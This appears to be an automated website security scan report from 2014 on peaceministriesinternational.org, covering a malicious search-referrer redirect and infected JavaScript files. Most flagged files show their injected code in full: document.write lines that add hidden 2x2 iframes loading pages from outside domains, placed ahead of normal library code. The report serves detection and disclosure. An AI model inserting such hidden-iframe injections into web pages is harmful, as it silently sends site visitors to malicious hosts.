Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://peaceministriesinternational.org/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: peaceministriesinternational.org Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 19 Apr 2014 02:15:14 GMT Location: http://gradneyvistica.com/cwzf.html?h=3235241 Server: Apache Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://peaceministriesinternational.org/ | 200 OK Content-Length: 11618 Content-Type: text/html | clean |
http://peaceministriesinternational.org/js/l10n.js | 200 OK Content-Length: 633 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641></iframe>'); function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> Hidden iFrame found. size: 2x2 src: http://ibensolutions.com/wamf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641> | ||
http://peaceministriesinternational.org/js/shutter-reloaded.js | 200 OK Content-Length: 10131 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://batmangames4u.com/ecaf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://batmangames4u.com/ecaf.html?j=1525641> Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> | ||
http://peaceministriesinternational.org/js/jquery_003.js | 200 OK Content-Length: 91687 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://ibensolutions.com/wamf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641> Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> | ||
http://peaceministriesinternational.org/js/jquery_002.js | 200 OK Content-Length: 31357 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641></iframe>'); (function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log( Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ibensolutions.com/wamf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641> Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> | ||
http://peaceministriesinternational.org/js/ngg.js | 200 OK Content-Length: 2075 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641></iframe>'); jQuery.fn.nggSlideshow=function(args){var defaults={id:1,width:320,height:240,fx:'fade',domain:'',timeout:5000};var s=jQuery.extend({}, jQuery(img).css({'height':height,'width':width});return img;};function jCycle_onBefore(curr,next,opts){if(opts.addSlide) if(stackLength>0){var img=new Image();img.src=stack.shift();stackLength--;jQuery(img).bind('load',function(){opts.addSlide(imageResize(this,s.width,s.height));});}};} Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ibensolutions.com/wamf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641> Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> | ||
http://peaceministriesinternational.org/js/mod_briaskISS.js | 200 OK Content-Length: 3717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641></iframe>'); function briaskISS(idModule, random, picInterval, transDelay, picArray) { this.picRandom = random; this.picInterval = pic this.picArray[0][this.nextPic].style.filter = "alpha(opacity=" + (this.nextOpacity) + ")"; if (this.curOpacity > 0) { this.curOpacity -= 4; this.nextOpacity += 4; setTimeout("briaskInstance"+this.idModule+".issTransition()", this.transDelay); } else { this.picArray[0][this.curPic].style.display = "none"; this.curPic = this.nextPic; setTimeout("briaskInstance"+this.idModule+".issShow()", this.picInterval); } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> Hidden iFrame found. size: 2x2 src: http://ibensolutions.com/wamf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641> | ||
http://peaceministriesinternational.org/js/jquery.js | 200 OK Content-Length: 22921 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641></iframe>'); ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no $sel.find('option').selected(false); } this.selected = select; } }); }; function log() { if ($.fn.ajaxSubmit.debug) { var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } } }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ibensolutions.com/wamf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641> Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> | ||
http://peaceministriesinternational.org/js/scripts.js | 200 OK Content-Length: 6127 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641></iframe>'); (function($) { $(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = { }); }); }; $.fn.wpcf7ClearResponseOutput = function() { return this.each(function() { $(this).find('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked'); $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ibensolutions.com/wamf.html?j=1525641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ibensolutions.com/wamf.html?j=1525641> Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3235241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3235241> | ||
http://peaceministriesinternational.org/index.htm | 200 OK Content-Length: 11618 Content-Type: text/html | clean |
http://peaceministriesinternational.org/aboutus.htm | 404 Not Found Content-Length: 328 Content-Type: text/html | clean |
http://peaceministriesinternational.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://peaceministriesinternational.org/board.htm | 404 Not Found Content-Length: 326 Content-Type: text/html | clean |
http://peaceministriesinternational.org/statement.htm | 404 Not Found Content-Length: 330 Content-Type: text/html | clean |
http://peaceministriesinternational.org/aims.htm | 200 OK Content-Length: 11708 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=peaceministriesinternational.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://peaceministriesinternational.org/
Result: peaceministriesinternational.org is not infected or malware details are not published yet.
Result: peaceministriesinternational.org is not infected or malware details are not published yet.